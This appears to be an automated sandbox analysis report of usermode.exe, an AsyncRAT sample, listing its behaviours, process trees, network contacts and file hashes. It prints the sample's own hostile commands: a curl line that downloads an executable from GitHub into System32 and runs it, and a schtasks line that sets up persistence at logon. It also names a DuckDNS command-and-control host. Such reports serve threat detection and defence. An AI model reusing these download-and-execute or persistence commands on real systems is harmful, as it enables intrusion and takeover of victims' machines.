Analysis Overview
SHA256
7cbd57fe2ffbaa6da63c865cce81eaf33c083e0b23d69cde51ada9f91f309a99
Threat Level: Known bad
The file usermode.exe was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Downloads MZ/PE file
Checks computer location settings
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Enumerates physical storage devices
Unsigned PE
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Suspicious use of AdjustPrivilegeToken
Delays execution with timeout.exe
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-20 04:13
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-20 04:13
Reported
2024-06-20 04:14
Platform
win7-20240419-en
Max time kernel
63s
Max time network
65s
Command Line
Signatures
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\usermode.exe
"C:\Users\Admin\AppData\Local\Temp\usermode.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe >nul 2>&1 && C:\\Windows\\System32\\boot_cnfg_x32.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.63.101.171:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| N/A | 127.0.0.1:49188 | tcp | |
| N/A | 127.0.0.1:49190 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-20 04:13
Reported
2024-06-20 04:16
Platform
win10v2004-20240611-en
Max time kernel
140s
Max time network
148s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\boot_cnfg_x32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\boot_cnfg_x32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\boot_cnfg_x32.exe | C:\Windows\system32\curl.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\boot_cnfg_x32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\usermode.exe
"C:\Users\Admin\AppData\Local\Temp\usermode.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe >nul 2>&1 && C:\\Windows\\System32\\boot_cnfg_x32.exe
C:\Windows\system32\curl.exe
curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe
C:\Windows\System32\boot_cnfg_x32.exe
C:\\Windows\\System32\\boot_cnfg_x32.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE62A.tmp.bat""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Roaming\Update.exe
"C:\Users\Admin\AppData\Roaming\Update.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4352,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=4084 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| GB | 87.248.205.0:80 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| N/A | 127.0.0.1:49840 | tcp | |
| N/A | 127.0.0.1:49842 | tcp | |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.72.67.172.in-addr.arpa | udp |
| US | 20.189.173.15:443 | tcp | |
| US | 8.8.8.8:53 | hmnms.duckdns.org | udp |
| CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:49869 | tcp | |
| N/A | 127.0.0.1:49871 | tcp | |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp |
| US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hmnms.duckdns.org | udp |
| CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp |
| CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp |
Files
C:\Windows\System32\boot_cnfg_x32.exe
| MD5 | 8f601efcbf3eb183bbd6500296b9ccd2 |
| SHA1 | 2542d3fe0e97fa969c0ef8e86676ba1c72e6e846 |
| SHA256 | 5e4a8ebbeb1b7288087c65c0f5edf6d6016528f2bf5104cfc7fd5b315bf1affd |
| SHA512 | d101aa1cc4281e29813aaa269b26d9e500a0ee042024273a636fc06d59d4af30d04d1670a58e54d3263cb6dfe9b67c71ef58c4175628841f2c8719260f548d08 |
memory/4500-4-0x00007FFA041D3000-0x00007FFA041D5000-memory.dmp
memory/4500-5-0x00000000009F0000-0x0000000000A02000-memory.dmp
memory/4500-6-0x00007FFA041D0000-0x00007FFA04C91000-memory.dmp
memory/4500-11-0x00007FFA041D0000-0x00007FFA04C91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpE62A.tmp.bat
| MD5 | 2c8bc37b47cf08664a78ebbffd76d23b |
| SHA1 | 49e2f3d19a7b9edd662b9763ae47629496ca4758 |
| SHA256 | 8a0da6a175df4c5ab306e7a27093f37aa60ef6f86f5e50d2b5c49fe991fad73a |
| SHA512 | b81d18a37f816146daf286018ae6eea6ef888abb817d3db62d0552b7214494c5d2fd9a352176c84811a04581e3660da5c17a48aed696cd8feaaf0ee32f179648 |